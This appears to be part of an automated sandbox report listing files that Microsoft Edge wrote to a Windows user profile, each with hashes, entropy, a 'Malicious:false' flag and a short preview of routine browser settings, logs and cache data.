                                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376674109197488","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):24853
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.56564327679101
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:y7rP4jWPFuM/f3a8F1+UoAYDCx9Tuqh0VfUC9xbog/OV/mz8YrwYpXtu8:y7rP4jWPIWf3au1jaCK8J4tD
                                                                                                                                                                                                                                                                                                                  MD5:CF391900AFB026F292636AD5B5E1A589
                                                                                                                                                                                                                                                                                                                  SHA1:458A7EBF2D7E00110570C5A23AE34F90A32C6967
                                                                                                                                                                                                                                                                                                                  SHA-256:941B5E4B6F187034F669335C0684290A314287831E6ED0C9ED24E7F5146CDE51
                                                                                                                                                                                                                                                                                                                  SHA-512:162E5FF66094791F5DBDB066D974E8082FC19228746C29B88EAF927668FB8646402FF78C9242AAB9C01EBEBBED4B9F33B137FBECD1BFAD6258E6CDCC6114E919
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376674108719745","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376674108719745","location":5,"ma

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3c5e1.TMP (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):24853
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.56564327679101
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:y7rP4jWPFuM/f3a8F1+UoAYDCx9Tuqh0VfUC9xbog/OV/mz8YrwYpXtu8:y7rP4jWPIWf3au1jaCK8J4tD
                                                                                                                                                                                                                                                                                                                  MD5:CF391900AFB026F292636AD5B5E1A589
                                                                                                                                                                                                                                                                                                                  SHA1:458A7EBF2D7E00110570C5A23AE34F90A32C6967
                                                                                                                                                                                                                                                                                                                  SHA-256:941B5E4B6F187034F669335C0684290A314287831E6ED0C9ED24E7F5146CDE51
                                                                                                                                                                                                                                                                                                                  SHA-512:162E5FF66094791F5DBDB066D974E8082FC19228746C29B88EAF927668FB8646402FF78C9242AAB9C01EBEBBED4B9F33B137FBECD1BFAD6258E6CDCC6114E919
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376674108719745","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376674108719745","location":5,"ma

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF3ef81.TMP (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):24853
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.56564327679101
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:y7rP4jWPFuM/f3a8F1+UoAYDCx9Tuqh0VfUC9xbog/OV/mz8YrwYpXtu8:y7rP4jWPIWf3au1jaCK8J4tD
                                                                                                                                                                                                                                                                                                                  MD5:CF391900AFB026F292636AD5B5E1A589
                                                                                                                                                                                                                                                                                                                  SHA1:458A7EBF2D7E00110570C5A23AE34F90A32C6967
                                                                                                                                                                                                                                                                                                                  SHA-256:941B5E4B6F187034F669335C0684290A314287831E6ED0C9ED24E7F5146CDE51
                                                                                                                                                                                                                                                                                                                  SHA-512:162E5FF66094791F5DBDB066D974E8082FC19228746C29B88EAF927668FB8646402FF78C9242AAB9C01EBEBBED4B9F33B137FBECD1BFAD6258E6CDCC6114E919
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376674108719745","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376674108719745","location":5,"ma

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):318
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.111820928550199
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:S85aEFljljljljl7em/lllaV93HS9+qyNRs+dUA5EEE:S+a8ljljljljl7hllcyBQ1H
                                                                                                                                                                                                                                                                                                                  MD5:4D524E847F93E7B28E1201AE556FF67D
                                                                                                                                                                                                                                                                                                                  SHA1:B7F919018D3BE1B221B9930F716C94745660152B
                                                                                                                                                                                                                                                                                                                  SHA-256:D79E5961BBE14700A1519AFCD99B9844099E77BB5D873FCE77C9CCF6C51DCB5B
                                                                                                                                                                                                                                                                                                                  SHA-512:707455E85E686F28DBA56F2826C88F0D29EF3994481B9A0BF565635DDBECA092735A092390FC0DF9185DC5D84395781BCE6EC24F02C363701293E4AC8340B41B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............y_..b................next-map-id.1.Cnamespace-3f73e1a5_92ce_475f_902b_50684866c462-https://ntp.msn.com/.0V.e................V.e................V.e................V.e................

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.210353007672496
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HES39+q2PCHhJ23oH+TcwtrQMxIFUt8YEdwJZmw+YELiw9VkwOCHhJ23oH+Tcwtf:kSN+vBYebCFUt8/dy/+/RV56YebtJ
                                                                                                                                                                                                                                                                                                                  MD5:C5AF2B92F0A02DB4C18C40ECBE29BBC9
                                                                                                                                                                                                                                                                                                                  SHA1:0462457C350A70CBD706519212CD07AEEBC78F87
                                                                                                                                                                                                                                                                                                                  SHA-256:C2AE1E0E972A77C6B155317D21A1E881714D68A89C68CCDBA83A3A2AA4E3AE90
                                                                                                                                                                                                                                                                                                                  SHA-512:F0E7B8084B13F888D4E3A531F4F606A67779F7CFB6DAD890DB5BF41F56F6BD4577F5CF6BADEAD4ADF0285CBBF1AB457D33FB861FAE76C55048D773822203406D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:29.662 16bc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/21-09:48:29.664 16bc Recovering log #3.2024/11/21-09:48:29.704 16bc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.210353007672496
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HES39+q2PCHhJ23oH+TcwtrQMxIFUt8YEdwJZmw+YELiw9VkwOCHhJ23oH+Tcwtf:kSN+vBYebCFUt8/dy/+/RV56YebtJ
                                                                                                                                                                                                                                                                                                                  MD5:C5AF2B92F0A02DB4C18C40ECBE29BBC9
                                                                                                                                                                                                                                                                                                                  SHA1:0462457C350A70CBD706519212CD07AEEBC78F87
                                                                                                                                                                                                                                                                                                                  SHA-256:C2AE1E0E972A77C6B155317D21A1E881714D68A89C68CCDBA83A3A2AA4E3AE90
                                                                                                                                                                                                                                                                                                                  SHA-512:F0E7B8084B13F888D4E3A531F4F606A67779F7CFB6DAD890DB5BF41F56F6BD4577F5CF6BADEAD4ADF0285CBBF1AB457D33FB861FAE76C55048D773822203406D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:29.662 16bc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/21-09:48:29.664 16bc Recovering log #3.2024/11/21-09:48:29.704 16bc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13376674111222586

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2521
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8169573186033126
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:38PvO/GTC+GIzFlSLp2FEkCh6WGNWyHOp7vmTISWo1+4f2mAFnFXDHOpZ:3MO/0LGasp2+k66VWyuhmTvZBaFzuP
                                                                                                                                                                                                                                                                                                                  MD5:B70CEDBC0C78E50989481F2E4DC36CDD
                                                                                                                                                                                                                                                                                                                  SHA1:ED0812EDE9114B95112C89EF87E1F88244DD2571
                                                                                                                                                                                                                                                                                                                  SHA-256:36CE733289877F6C6A22A93EDBA29AC9A4907FD9B140E3C3460A8193321595B9
                                                                                                                                                                                                                                                                                                                  SHA-512:1E3DC99EEAEE3C734D20DAEBFF3F64AB3D0B26A0D10805E6AB50050BD45395822D1D94FBF49CFDA26B100342C8A341AE0FF64E80D0A52078885B129E3CDBD948
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SNSS..........~..............~......"...~..............~..........~..........~..........~....!.....~..................................~...~1..,......~$...3f73e1a5_92ce_475f_902b_50684866c462......~..........~......\...........~......~..........................~....................5..0......~&...{890D5FC3-0C4C-4214-A93A-B8E730A022A1}........~..........~.............................~..............~........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x........f5\m'...f5\m'.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                                  MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                                  SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                                  SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                                  SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):352
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.140492825094368
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEZyjIq2PCHhJ23oH+Tcwt7Uh2ghZIFUt8YEdRXZmw+YEdRFkwOCHhJ23oH+TcwK:kcIvBYebIhHh2FUt8/T/+/J56YebIhHd
                                                                                                                                                                                                                                                                                                                  MD5:12268430013C14A9EAF8B5EF5A40FEF5
                                                                                                                                                                                                                                                                                                                  SHA1:5D38C25BB7744C4F6E2D633BF14929EAB283D965
                                                                                                                                                                                                                                                                                                                  SHA-256:37BB6B258A62D2474BC1B4EC2747106B1CA34F7458CEC10C1E511C344E010D4D
                                                                                                                                                                                                                                                                                                                  SHA-512:BC5F7404CE4D48B6964E104F046537D30E6B4A321AEE37619B77BED500A221BFD61B602331EFC6319DFFCF34158B2AA61679866E38907B35F4840D10DBD20AC2
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:28.790 1ac4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/21-09:48:28.791 1ac4 Recovering log #3.2024/11/21-09:48:28.791 1ac4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):352
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.140492825094368
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEZyjIq2PCHhJ23oH+Tcwt7Uh2ghZIFUt8YEdRXZmw+YEdRFkwOCHhJ23oH+TcwK:kcIvBYebIhHh2FUt8/T/+/J56YebIhHd
                                                                                                                                                                                                                                                                                                                  MD5:12268430013C14A9EAF8B5EF5A40FEF5
                                                                                                                                                                                                                                                                                                                  SHA1:5D38C25BB7744C4F6E2D633BF14929EAB283D965
                                                                                                                                                                                                                                                                                                                  SHA-256:37BB6B258A62D2474BC1B4EC2747106B1CA34F7458CEC10C1E511C344E010D4D
                                                                                                                                                                                                                                                                                                                  SHA-512:BC5F7404CE4D48B6964E104F046537D30E6B4A321AEE37619B77BED500A221BFD61B602331EFC6319DFFCF34158B2AA61679866E38907B35F4840D10DBD20AC2
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:28.790 1ac4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/21-09:48:28.791 1ac4 Recovering log #3.2024/11/21-09:48:28.791 1ac4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):434
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.244464658380144
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:k+R4vBYebvqBQFUt8/5J/+/UUCD56YebvqBvJ:k1BYebvZg8/Yg6Yebvk
                                                                                                                                                                                                                                                                                                                  MD5:BC6C9405773456BA576FA0E68856B476
                                                                                                                                                                                                                                                                                                                  SHA1:AE3D7C0DC48FCFD6BFE60A871B99C2B99BFE99EE
                                                                                                                                                                                                                                                                                                                  SHA-256:57F3276EA8262CE881B7B3548C0AF206BBADAD5865D16F75E0DDC63B24FF1CAF
                                                                                                                                                                                                                                                                                                                  SHA-512:3075A14B1C123D93E182336BBA3462324CD8180A65834080EED919F1FB3E2911442F1FABE69063ADC35A99AC83EA6289CEAF72C646564017D77D50DBC8A035FC
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:29.738 1c20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/21-09:48:29.739 1c20 Recovering log #3.2024/11/21-09:48:29.787 1c20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):434
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.244464658380144
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:k+R4vBYebvqBQFUt8/5J/+/UUCD56YebvqBvJ:k1BYebvZg8/Yg6Yebvk
                                                                                                                                                                                                                                                                                                                  MD5:BC6C9405773456BA576FA0E68856B476
                                                                                                                                                                                                                                                                                                                  SHA1:AE3D7C0DC48FCFD6BFE60A871B99C2B99BFE99EE
                                                                                                                                                                                                                                                                                                                  SHA-256:57F3276EA8262CE881B7B3548C0AF206BBADAD5865D16F75E0DDC63B24FF1CAF
                                                                                                                                                                                                                                                                                                                  SHA-512:3075A14B1C123D93E182336BBA3462324CD8180A65834080EED919F1FB3E2911442F1FABE69063ADC35A99AC83EA6289CEAF72C646564017D77D50DBC8A035FC
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:29.738 1c20 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/21-09:48:29.739 1c20 Recovering log #3.2024/11/21-09:48:29.787 1c20 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\30962e57-71a2-4612-a59a-1fb555e9f1ef.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\43617108-6bc7-4971-82e9-c874e5955678.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
